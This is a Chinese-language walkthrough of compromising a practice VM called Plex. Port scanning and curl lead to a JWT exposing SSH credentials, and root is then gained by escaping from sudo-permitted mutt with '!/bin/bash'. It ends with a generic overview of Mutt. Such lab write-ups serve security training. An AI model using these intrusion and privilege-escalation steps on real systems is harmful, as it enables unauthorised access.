# 靶场搭建
下载:Plex
Nat,IP: 192.168.1.145
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
21/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0) | |
| ssh-hostkey: | |
| 2048 56:9b:dd:56:a5:c1:e3:52:a8:42:46:18:5e:0c:12:86 (RSA) | |
| 256 1b:d2:cc:59:21:50:1b:39:19:77:1d:28:c0:be:c6:82 (ECDSA) | |
|_ 256 9c:e7:41:b6:ad:03:ed:f5:a1:4c:cc:0a:50:79:1c:20 (ED25519) | |
|_ftp-bounce: ERROR: Script execution failed (use -d to debug) |
只开了一个 21 端口,既有 ssh 和 ftp。复用?和靶机的名字不谋而合。
ftp 连不上去啊?感到困惑
柳暗花明,curl 端口 21 发现有提示
拉去 dirb 扫。
┌──(root㉿kali)-[~] | |
└─# curl http://192.168.1.145:21/robots.txt | |
User-agent: * | |
Disallow: /9a618248b64db62d15b300a07b00580b |
┌──(root㉿kali)-[~] | |
└─# curl http://192.168.1.145:21/9a618248b64db62d15b300a07b00580b | |
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | |
<html><head> | |
<title>301 Moved Permanently</title> | |
</head><body> | |
<h1>Moved Permanently</h1> | |
<p>The document has moved <a href="http://192.168.1.145:21/9a618248b64db62d15b300a07b00580b/">here</a>.</p> | |
<hr> | |
<address>Apache/2.4.38 (Debian) Server at 192.168.1.145 Port 21</address> | |
</body></html> |
301 跳转了,加 -L 跟随
┌──(root㉿kali)-[~] | |
└─# curl http://192.168.1.145:21/9a618248b64db62d15b300a07b00580b -L | |
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiIiLCJpYXQiOm51bGwsImV4cCI6bnVsbCwiYXVkIjoiIiwic3ViIjoiIiwiaWQiOiIxIiwidXNlcm5hbWUiOiJtYXVybyIsInBhc3N3b3JkIjoibUB1UjAxMjMhIn0.zMeVhhqARJ6YzuMtwahGQnegFDhF7r0BCPf3H9ljDIk |
一个 jwt 的令牌,随便找一个在线解密拿出去解密看看,发现了账号密码:
{ | |
"iss": "", | |
"iat": null, | |
"exp": null, | |
"aud": "", | |
"sub": "", | |
"id": "1", | |
"username": "mauro", | |
"password": "m@uR0123!" | |
} |
ssh 一下试试
┌──(root㉿kali)-[~] | |
└─# ssh [email protected] -p21 | |
[email protected]'s password: | |
mauro@plex:~$ |
# 提权
sudo -l 看到有一个 mutt 程序,运行一下试试
很像 vi,所以尝试使用 !/bin/bash 就拿到了 root
# 小结
Mutt 是一个文本模式的电子邮件客户端,它允许用户在命令行界面下阅读、发送和管理电子邮件。Mutt 是一个非常灵活和强大的工具,它很受 Unix/Linux 系统上的高级用户和管理员的喜爱。
以下是 Mutt 的一些主要特点和功能:
文本模式界面: Mutt 在命令行下运行,并提供基于文本的用户界面。这使得它可以在终端或远程连接中使用,非常适合那些更喜欢命令行界面的用户。
支持多种邮件协议: Mutt 支持多种邮件协议,包括 IMAP、POP3 和 SMTP,使用户能够轻松地连接到不同类型的邮件服务器。
定制性强: Mutt 具有非常高的定制性,用户可以通过配置文件和插件来定制各种功能和外观。这使得用户能够根据自己的喜好和需求来定制 Mutt 的行为。
内置功能丰富: Mutt 提供了丰富的内置功能,包括邮件过滤、标记、搜索、归档等功能,使用户能够高效地管理大量的电子邮件。
支持 PGP/GPG 加密: Mutt 支持使用 PGP(Pretty Good Privacy)或 GPG(GNU Privacy Guard)来对邮件进行加密和签名,从而保护邮件的安全性和隐私性。
